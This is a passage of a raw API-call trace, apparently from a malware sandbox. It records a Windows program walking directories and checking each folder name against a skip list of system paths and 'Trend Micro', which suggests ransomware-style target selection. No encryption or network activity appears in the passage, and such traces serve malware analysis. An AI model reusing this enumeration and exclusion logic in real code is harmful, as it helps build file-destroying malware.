cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0141.048] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2=".") returned 1 [0141.048] lstrcmpW (lpString1="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="..") returned 1 [0141.048] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="tmp") returned 0x0 [0141.048] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="winnt") returned 0x0 [0141.048] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="temp") returned 0x0 [0141.048] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="thumb") returned 0x0 [0141.048] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="$Recycle.Bin") returned 0x0 [0141.048] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.048] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="System Volume Information") returned 0x0 [0141.049] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="Boot") returned 0x0 [0141.049] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="Windows") returned 0x0 [0141.049] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="Trend Micro") returned 0x0 [0141.049] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0141.049] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.049] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.049] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0141.049] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.049] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.049] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0141.049] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef24e8 [0141.049] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed570 [0141.049] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0141.049] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", cAlternateFileName="{37B8F~1.610")) returned 1 [0141.049] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2=".") returned 1 [0141.049] lstrcmpW (lpString1="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="..") returned 1 [0141.049] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="tmp") returned 0x0 [0141.049] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="winnt") returned 0x0 [0141.049] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="temp") returned 0x0 [0141.049] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="thumb") returned 0x0 [0141.050] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="$Recycle.Bin") returned 0x0 [0141.050] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.050] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="System Volume Information") returned 0x0 [0141.050] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="Boot") returned 0x0 [0141.050] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="Windows") returned 0x0 [0141.050] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="Trend Micro") returned 0x0 [0141.050] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.050] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.050] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.050] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.050] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.050] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.050] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.050] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2830 [0141.050] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xed8dd8 [0141.050] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.050] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a0db1a0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a127460, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a127460, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{3c3aafc8-d898-43ec-998f-965ffdae065a}", cAlternateFileName="{3C3AA~1")) returned 1 [0141.050] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2=".") returned 1 [0141.050] lstrcmpW (lpString1="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpString2="..") returned 1 [0141.050] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="tmp") returned 0x0 [0141.050] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="winnt") returned 0x0 [0141.051] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="temp") returned 0x0 [0141.051] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="thumb") returned 0x0 [0141.051] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="$Recycle.Bin") returned 0x0 [0141.051] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.051] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="System Volume Information") returned 0x0 [0141.051] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="Boot") returned 0x0 [0141.051] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="Windows") returned 0x0 [0141.051] StrStrIW (lpFirst="{3c3aafc8-d898-43ec-998f-965ffdae065a}", lpSrch="Trend Micro") returned 0x0 [0141.051] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2c60 [0141.051] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.051] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.051] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed4d8 [0141.051] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.051] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.051] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0141.051] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2858 [0141.051] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xeed608 [0141.051] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeed4d8 | out: hHeap=0xea0000) returned 1 [0141.051] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", cAlternateFileName="{582EA~1.250")) returned 1 [0141.051] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2=".") returned 1 [0141.052] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="..") returned 1 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="tmp") returned 0x0 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="winnt") returned 0x0 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="temp") returned 0x0 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="thumb") returned 0x0 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="$Recycle.Bin") returned 0x0 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="System Volume Information") returned 0x0 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="Boot") returned 0x0 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="Windows") returned 0x0 [0141.052] StrStrIW (lpFirst="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpSrch="Trend Micro") returned 0x0 [0141.052] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.052] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.052] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.052] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.052] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.052] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.052] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.052] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2880 [0141.052] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xed3a00 [0141.053] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.053] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", cAlternateFileName="{68306~1.250")) returned 1 [0141.053] lstrcmpW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2=".") returned 1 [0141.053] lstrcmpW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="..") returned 1 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="tmp") returned 0x0 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="winnt") returned 0x0 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="temp") returned 0x0 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="thumb") returned 0x0 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="$Recycle.Bin") returned 0x0 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="System Volume Information") returned 0x0 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="Boot") returned 0x0 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="Windows") returned 0x0 [0141.053] StrStrIW (lpFirst="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpSrch="Trend Micro") returned 0x0 [0141.053] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.053] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.054] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.054] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.054] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.054] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.054] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.054] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef28a8 [0141.054] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xee5378 [0141.054] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.054] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", cAlternateFileName="{8D4F7~1.250")) returned 1 [0141.054] lstrcmpW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2=".") returned 1 [0141.054] lstrcmpW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="..") returned 1 [0141.054] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="tmp") returned 0x0 [0141.054] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="winnt") returned 0x0 [0141.054] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="temp") returned 0x0 [0141.055] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="thumb") returned 0x0 [0141.055] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="$Recycle.Bin") returned 0x0 [0141.055] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.055] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="System Volume Information") returned 0x0 [0141.055] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="Boot") returned 0x0 [0141.055] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="Windows") returned 0x0 [0141.055] StrStrIW (lpFirst="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpSrch="Trend Micro") returned 0x0 [0141.055] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.055] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.055] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.055] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.055] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.055] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.055] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.055] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef28d0 [0141.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xee12b0 [0141.056] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.056] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", cAlternateFileName="{929FB~1.210")) returned 1 [0141.056] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2=".") returned 1 [0141.056] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="..") returned 1 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="tmp") returned 0x0 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="winnt") returned 0x0 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="temp") returned 0x0 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="thumb") returned 0x0 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="$Recycle.Bin") returned 0x0 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="System Volume Information") returned 0x0 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="Boot") returned 0x0 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="Windows") returned 0x0 [0141.056] StrStrIW (lpFirst="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpSrch="Trend Micro") returned 0x0 [0141.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.056] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.056] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.056] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.057] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.057] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef28f8 [0141.057] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef0d68 [0141.057] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.057] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a199880, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a1e5b40, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", cAlternateFileName="{A749D~1.210")) returned 1 [0141.057] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2=".") returned 1 [0141.057] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="..") returned 1 [0141.057] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="tmp") returned 0x0 [0141.057] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="winnt") returned 0x0 [0141.057] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="temp") returned 0x0 [0141.057] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="thumb") returned 0x0 [0141.057] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="$Recycle.Bin") returned 0x0 [0141.059] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.059] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="System Volume Information") returned 0x0 [0141.059] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="Boot") returned 0x0 [0141.059] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="Windows") returned 0x0 [0141.059] StrStrIW (lpFirst="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpSrch="Trend Micro") returned 0x0 [0141.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeee8d8 [0141.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0141.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xedab30 [0141.059] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0141.059] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.059] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee8d8 | out: hHeap=0xea0000) returned 1 [0141.059] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2920 [0141.060] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xa0) returned 0xef0e10 [0141.060] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab30 | out: hHeap=0xea0000) returned 1 [0141.060] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedbebcc0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0141.060] lstrcmpW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2=".") returned 1 [0141.060] lstrcmpW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="..") returned 1 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="tmp") returned 0x0 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="winnt") returned 0x0 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="temp") returned 0x0 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="thumb") returned 0x0 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpSrch="$Recycle.Bin") returned 0x0 [0141.060] StrStrIW (lpFirst="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", 